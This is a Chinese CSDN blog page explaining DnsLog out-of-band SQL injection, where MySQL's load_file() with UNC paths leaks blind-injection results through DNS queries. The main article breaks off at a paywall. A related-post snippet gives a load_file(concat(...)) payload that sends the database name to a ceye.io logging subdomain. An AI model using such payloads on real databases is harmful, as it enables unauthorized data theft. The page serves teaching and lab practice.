SQL注入之DnsLog注入

xclay

已于 2023-03-24 11:27:02 修改

阅读量2.3k

点赞数 5

文章标签： sql 数据库网络安全 web安全

于 2023-03-22 18:17:01 首次发布

本文链接：https://blog.csdn.net/qq_52310755/article/details/129715950

版权

一、原理

DnsLog注入可以理解成是一种技巧，而不是一种攻击方式，是一种让无回显的攻击，变得有回显的方式，包括但不限于SQL盲注，下面以盲注为例，需要有盲注的基础。

在解释原理之前，首先了解一下几样东西，如下：

1. load_file函数

Mysql数据库的load_file()函数不单可以读取本地文件，还可以通过UNC路径访问远程文件。

DnsLog注入就是利用load_file()函数访问远程文件的特点，对延时盲注等无回显的注入或其他无回显的攻击带来回显。

2. UNC路径

UNC路径格式：//servername/sharename/directory/filename

UNC路径就是类似上面这样形式的网络路径。它符合//servername/sharename 格式

servername 是服务器名或者域名
sharename 是共享资源的名称

UNC 名称可以包括共享名称下的目录路径 /directory/filename

实例及解读： //xclay.net/share/张三/账单.docs

如果访问上述UNC路径的话，就会得到xclay.net 服务器

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

xclay

关注关注

5
点赞
踩
17

收藏

觉得还不错? 一键收藏
6
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sql 注入 Dnslog

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-12

454

通常我们面对SQL注入过程中没有回显的情况下，只能通过盲注的方式来判断是否存在SQL注入，但是，使用盲注，手工测试是需要花费大量的时间的，可能会想到使用sqlmap直接去跑出数据，但在实际测试中，使用sqlmap跑盲注，有很大的几率，网站把ip给封掉，这就影响了我们的测试进度，也许你也可以使用代理池。。。

dnslog注入_dnslog盲注

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

09-09

1986

dnslog注入原理通过子查询，将内容拼接到域名内，让load_file()去访问共享文件，访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件，通过拼接出函数做查询,拼接到域名中，访问时将访问服务器，记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示，注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数，这个函数的目的是读取本地文件，也可以对外发送请求，利用这个函数，我们再使用concat函数将dnslog

6 条评论您还未登录，请先登录后发表或查看评论

SQL注入——DNSLOG注入

qq_52263650的博客

11-17

853

SQL注入——DNSlog注入

穿透式侦查：DNSLog在红队攻防中的降维打击

最新发布

安全瞭望Sec

03-26

1185

DNSLog 是一种基于 DNS 协议的隐蔽通信技术，主要用于网络安全领域的漏洞探测与攻击验证

dnslog的sql注入

weixin_44894463的博客

07-09

283

前两天看到了一个骚姿势，没有回显的时候利用dnslog来得到数据库名等。可以在一个网站上注册ceye.io，注册就可以得到一个二级域名。用到了load_file() ，用法是load_file(文件名)，比如这样：select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...

SQL DNSlog注入详解

永远是少年

08-07

1441

SQL注入之DNSLog外带注入

dragon的博客

02-21

3333

什么是dnslog呢？DNS就是域名解析服务，把一个域名转换成对应的IP地址，转换完成之后，DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息，这个日志就叫DNSLog。但是想要查看DNSLog信息的人，必须是拥有DNS服务器权限的人，这就使的我们要是用dnslog注入方法的话，就需要搭建自己的一个dns服务器，成本相对较高。所以在此就推荐两个平台，可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。

26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例

2301_76268112的博客

05-15

1106

别在网上瞎学了，我最近也做了一些资源的更新，只要你是我的粉丝，这期福利你都可拿走。我先来介绍一下这些东西怎么用，文末抱走。这是我花了几天的时间去把Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。最近我才对这些路线做了一下新的更新，知识体系更全面了。

sql注入外带dnslog

09-11

很抱歉，我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞，允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞，应该被尽快修复。...

【SQL注入】DNSlog方式

m0_57347472的博客

03-22

353

DNSlog注入也可以称之为dns带外查询，Dns在域名解析时会在DNS服务器上留下域名和解析il的记录，可以在dns服务器上查询相应的dns解析记录，来获取大致原理。那么我们就可以通过只有的方式然后拼接数据库函数，通过DNSlog获得数据库的信息。http://ceye.io/ 知道创宇公司提供的。上图是创宇公司提供的的DNSlog服务器网址。修改limit的数字即可得到其他表名。DNSlog服务器无需自己搭建。此处的路径我们称之为UNC路径。

SQL注入（7）之DNSLOG注入

2401_88816569的博客

03-13

826

DNSLog注入如何实现无回显数据窃取？解析盲注与外带数据结合攻击链路，拆解DNS请求窃密步骤及防御策略，强化隐蔽漏洞检测能力！

SQL注入：DNSlog注入

zh的博客

10-12

909

靶场地址：http://61.136.208.14:8003/ 解题准备：DNSlog平台解题思路： 1、根据提示，需要使用dnslog平台进行注入 DNSLog Platform 生成并复制域名 2、然后判断靶场的闭合符 id=1 页面正常 id=1' id=1' --+ 报错 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常确定没有闭合符，应该是数字型根据DNSlog注入的通用语句，构建注入语句 ?id=1 and (select load_

SQL注入-DNSlog注入（手工加工具使用）

没有

04-17

7457

DNSlog注入

SQL注入之DNS_log注入

weixin_47785246的博客

07-11

944

SQL注入之DNS_log注入这篇文章将系统的讲解，SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。文章目录SQL注入之DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结前言关于SQL注入的详细内容请看我之前写的文章提示：以下是本篇文章正文内容，下面案例可供参考一、DNS_log注入原理我们都知道，DNS解析是一种用户访问域名时，客户端向DNS发起DNS查询的到目标服务器ip地址，进而实现通信的机制，而

dnslog 在 sql注入中的应用

whatday的专栏

07-23

771

目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的，下面给出了当我们访问www.cloudcrowd.com.cn时， DNS的解析过程示意图其中，红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器，并将要盲打或盲注的回显，放到自己域名的二级甚至三级域名上去请求，就可以通过DNS解析日志来获取到它们。

DNSLog注入

一期一会的博客

01-13

4645

DNSLog注入原理在sql注入时为布尔盲注、时间盲注，注入的效率低且线程高容易被waf拦截，又或者是目标站点没有回显，我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功，这时候就要用到我们的DNSlog注入。首先需要有一个可以配置的域名，比如：xxx.io，然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 xxx.io 及其子域名的查询都会到服务器 A 上，这时就能够实时地监控域名查询请

小白的CTF之路之DNSlog注入

glass_york的博客

01-07

1221

dnslog注入，sqlilabs第九关

SQL注入--DNSlog外带注入--理论

m0_56019217的博客

11-23

1028

DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如，以点为分隔，从右向左依次是顶级域名、二级域名、三级域名。即，net是顶级域名，csdn是二级域名，blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析：这里就是被解析后，与csdn.com进行了拼接，然后再去执行Ping命令。这里我们界面就回显得到了，也就是得到了的值。这个过程就可以被称为DNSlog外带。